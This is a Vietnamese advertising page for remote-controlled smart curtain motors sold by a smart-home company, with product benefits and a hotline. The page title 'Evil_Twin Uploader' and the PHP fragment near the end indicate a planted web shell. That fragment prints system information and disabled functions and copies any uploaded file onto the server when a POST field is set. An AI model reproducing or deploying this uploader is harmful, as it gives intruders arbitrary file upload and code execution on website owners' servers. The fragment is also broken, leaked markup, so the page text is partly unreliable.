Evil_Twin Uploader

Động cơ rèm thông minh điều khiển từ xa

Rèm Tự Động hay còn gọi rèm thông minh điều khiển từ xa không còn quá xa lạ với nhiều gia đình Việt bởi những tính năng vượt trội. CÔNG TY CỔ PHẦN WONDER HOME VN là đơn vị cung cấp các giải pháp nhà thông minh nói chung và động cơ rèm thông minh nói chúng mang đến cho khách hàng những tiện ích hiện đại nhất.

Những tiện lợi của rèm thông minh điều khiển từ xa:

– Điều khiển rèm từ xa một cách dễ dàng và đơn giản
– Rèm tự động với chi phí hợp lý:
– Các mẫu rèm tự động có remote điều khiển từ xa rất tiện lợi, chi phí cũng không đắt hơn rèm thông thường nhiều. Loại rèm tự động này rất phù hợp với các tòa nhà biệt thự, ngôi nhà lấy ánh sáng từ thiên nhiên từ trên cao.
– Mang đến vẻ sang trọng và đẳng cấp cho căn hộ của bạn .
– Có thể hẹn giờ giống như những thiết bị thông minh khác để đóng/mở rèm tùy theo thời gian bạn đặt .

rèm thông minh điều khiển từ xa

Xem thêm:  giải pháp nhà thông minh không dây sử dụng sóng Zigbee

Động cơ rèm này có thể được tích hợp với hệ thống nhà thông minh và được điều khiển bởi ứng dụng điện thoại, giúp cuộc sống của bạn thuận tiện và thoải mái hơn. Thay vì phải dùng sức và phải ra tận nơi để kéo từng chiếc màn, người sử dụng chỉ cần một chiếc điều khiển từ xa.

Quý khách hàng có nhu cầu tư vấn về sản phẩm rèm thông minh điều khiển từ xa vui lòng liên hệ với chúng tôi để được tư vấn và báo giá tốt nhất theo Hotline: 024.6688.7518 / 0167.205.9868

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial